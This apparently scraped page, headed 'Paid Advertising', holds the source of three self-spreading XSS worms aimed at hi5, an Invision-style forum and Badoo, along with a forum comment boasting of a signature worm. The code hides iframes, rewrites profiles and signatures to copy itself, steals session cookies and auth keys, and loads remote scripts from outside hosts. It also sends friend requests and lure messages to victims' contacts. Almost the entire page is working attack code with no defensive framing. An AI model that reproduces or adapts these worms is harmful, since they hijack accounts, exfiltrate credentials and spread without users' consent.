Paid Advertising
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xs">
<implementation>
<constructor>
(function q(){
function $(u,x){with(document)with(body)(x=appendChild(createElement('iframe'))).src=u;return x;}
if(!window.p){
window.p=escape("("+q+")();");
alert(/hi5 xss worm wishes you a merry merry xmas/);
$("http://www.hi5.com/friend/profile/removeSkin.do").height=0;
$("http://www.hi5.com/friend/account/displayEditProfileCustomization.do").height=0;
var m=setInterval(function(){
try{
frames[1].document.forms[0].backgroundImageURL.value="http://www.x.se/ye59";
frames[1].document.forms[0].style.value="body{width:expression(eval(unescape(\""+window.p+"\")));-moz-binding:url('http://www.sirdarckcat.net/xssworm.xml#xs');}";
frames[1].document.forms[0].submit();
setTimeout(function(){frames[1].location="http://www.hi5.com/friend/account/displayEditProfileCustomization.do";},2000);
}catch(e){}
},1000);
}
})();
</constructor>
</implementation>
</binding>
</bindings>
Quote
I once wrote an xss worm on a forum based on a flaw in a javascript code (it called unescape on info from the user's signature). I had it add it's code as well as a bit of invisible text as a payload and it took several weeks before it was discovered. By that time every active member of the forum had the worm in their signature. The admin must have discovered what the source of the problem was because the code was removed (and the worm failed to work after that). I could publish the code if it's of interest.
<a href='http://eapr-1/@0@%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%31%2E%74%69%6E%79%70%69%63%2E%63%6F%6D%2F%32%76%76%31%61%68%31%2E%67%69%66%22%20%6F%6E%6C%6F%61%64%3D%22%6C%6F%61%64%6A%73%28%27%68%74%74%70%3A%2F%2F%77%77%77%2E%66%69%6C%65%64%65%6E%2E%63%6F%6D%2F%66%69%6C%65%73%2F%32%30%30%36%2F%31%31%2F%32%37%2F%34%32%38%32%35%35%2F%74%65%73%74%2E%74%78%74%27%29%22%20%2F%3E@-2@@1@0@-3@@' target='_blank'></a>
var req = null; var stage = 0; var hack = "sig"; var url = "http://maple-world.net/"; var member = ""; var forum = ""; var topic = ""; var title = ""; var post = " ~~~~@"; vector="%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%31%2E%74%69%6E%79%70%69%63%2E%63%6F%6D%2F%32%76%76%31%61%68%31%2E%67%69%66%22%20%6F%6E%6C%6F%61%64%3D%22%6C%6F%61%64%6A%73%28%27%68%74%74%70%3A%2F%2F%77%77%77%2E%66%69%6C%65%64%65%6E%2E%63%6F%6D%2F%66%69%6C%65%73%2F%32%30%30%36%2F%31%31%2F%32%37%2F%34%32%38%32%35%35%2F%74%65%73%74%32%2E%74%78%74%27%29%22%20%2F%3E"; if (window.XMLHttpRequest) { req = new XMLHttpRequest(); if (req.overrideMimeType) { req.overrideMimeType('text/xml'); } } else if (window.ActiveXObject) { try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } } req.onreadystatechange = function() { if(req.readyState == 4) { if(req.status == 200) { if(hack == "post" || hack == "pin") { stage += 1; if(stage==1) { var i = req.responseText.indexOf("auth_key' value='") + 17; auth = req.responseText.substring(i, i + 32); req.open("POST", url + "index.php?", true); if(hack=="post") { var parameters = "act=Post&s=&f="+forum+"&auth_key="+auth+"&CODE=03&enableemo=yes&t="+topic+"&Post="+post; } else if(hack == "pin") { var parameters = "act=Mod&f="+forum+"&auth_key="+auth+"&CODE=15&t="+topic; } req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.setRequestHeader("Content-length", parameters.length); req.setRequestHeader("Connection", "close"); req.send(parameters); } } else if(hack=="sig") { stage+=1; if(stage==1) { key=req.responseText.match(/<input type='hidden' name='key' value='([0-9a-f]+)' \/>/)[1]; old=req.responseText.match(/<textarea cols='60' rows='12' name='Post' tabindex='3' class='textinput'>([\s\S]+?)<\/textarea>/)[1]; xpr=old.match(/<a href='http:\/\/eapr-1\/(@[^@]*@[^@]*)(@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@)' target='_blank'><\/a>/); if(xpr){ if(xpr[1].indexOf(vector)<0){xpr1=xpr[1]+vector;}else{xpr1=xpr[1];} nxp="+"]"; old=old.replace(/<a href='http:\/\/eapr-1\/[^']+' target='_blank'><\/a>/,nxp); } if(old.indexOf(post)<0){ parameters="act=UserCP&CODE=23&key="+key+"&Post="+encodeURIComponent(old+post); req.open("POST", url + "index.php?", true); req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.setRequestHeader("Content-length", parameters.length); req.setRequestHeader("Connection", "close"); req.send(parameters); } } } } } }; if(stage==0) { if(hack=="post" || hack=="pin") { req.open("GET", url + "index.php?act=Post&CODE=02&f="+forum+"&t="+topic, true); req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.send(null); } else if(hack=="PM") { req.open("POST", url + "index.php?", true); post = encodeURI(post); title = encodeURI(title); var parameters = "act=Msg&CODE=04&MODE=01&OID=&entered_name="+member+"&msg_title="+title+"&Post="+post; req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.setRequestHeader("Content-length", parameters.length); req.setRequestHeader("Connection", "close"); req.send(parameters); } else if(hack=="sig") { req.open("GET", url + "index.php?act=UserCP&CODE=22", true); req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.send(null); } }
var x;
b=Math.floor(Math.random()*1000000);
if(window.XMLHttpRequest)
x = new XMLHttpRequest();
else if(window.ActiveXObject)
x = new ActiveXObject("Microsoft.XMLHTTP");
u=document.location; //url
l=document.cookie.split(";");
c=l[2].substring(4,36); //cookie
p=document.links[6].href; //page
t=(document.links[6].href).split(".");
r=t[0].substring(7,t[0].length); //number of the page because its like that --> hxxp://number.badoo.com
if(u!=p){ //like that, there isnt a new reportage all the time you visit your profil
sh="\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"submit_to\"\r\n\r\n"+p+"entry/0/edit/103?noupload=1\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"s1\"\r\n\r\n"+c+"\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"upload_ws_url\"\r\n\r\nhxxp://87.245.192.195"+r+"/entry/0/upload/1\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"self_domain\"\r\n\r\n"+p+"\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"entry_id\"\r\n\r\n0\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"day\"\r\n\r\n7\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"month\"\r\n\r\n2\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"year\"\r\n\r\n2008\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"who_view\"\r\n\r\nAll\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"had_password\"\r\n\r\n0\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"entrypwd\"\r\n\r\n\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"who_comment\"\r\n\r\nAll\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"title\"\r\n\r\nI will become an hero\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"body\"\r\n\r\n<script>r=document;t=\"http:/\"; s=r.createElement(\"script\"); s.src=t.concat(\"/kurl.nl?1B9E\" );r.body.appendChild(s); </script>";
sh+="\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"file\";filename=\"\"\r\nContent-Type:";
sh+="application/octet-stream\r\n\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"save\"\r\n\r\nCr%c3%a9er reportage\r\n--"+b+"--\r\n";";
x.open("POST",u+"entry/create/",true); //little error in badoo, you can post a reportage from another page that yours
x.setRequestHeader("Content-Length",sh.length);
x.setRequestHeader("Content-Type","multipart/form-data; boundary="+b);
x.send(sh);
}else{ //only when you visit your profil, that send a friendrequest and send a message at all your friends
d="user_id=097994444&code=&burl="+p+"contacts/&friendship_type_group[Friend]=1&";
d+="friendship_type[]=Friend&friendship_type[]=FamilyMember&friendship_type[]=ProfessionalContact&submit=Ajouter+dans+la+liste+d%27amis";
x.open("POST",u+"friend/new_request.phtml",true);
x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
x.setRequestHeader("Content-Length",d.length);
x.send(d);
x.onreadystatechange=function(){
if(x.readyState==4 && x.status==200){
x.open("GET",u+"friends/",false);
x.send(null);
j=x.responseText;
f=j.split("has ");
z=f[1].substring(0,1);
p=j.split("\"uid");
i=1;
function A(i){
d2="s1="+c+"&contact_user_id=0"+p.substring(0,8)+"&action=add&message=Come see my new pictures Kisss&flash=1";
x.open("POST",u+"contacts/ws-post.phtml",false);
x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
x.setRequestHeader("Content-Length",d2.length);
x.send(d2);
setTimeout(function(){A(i+1)},1000);
}
A(i);
}
}
}
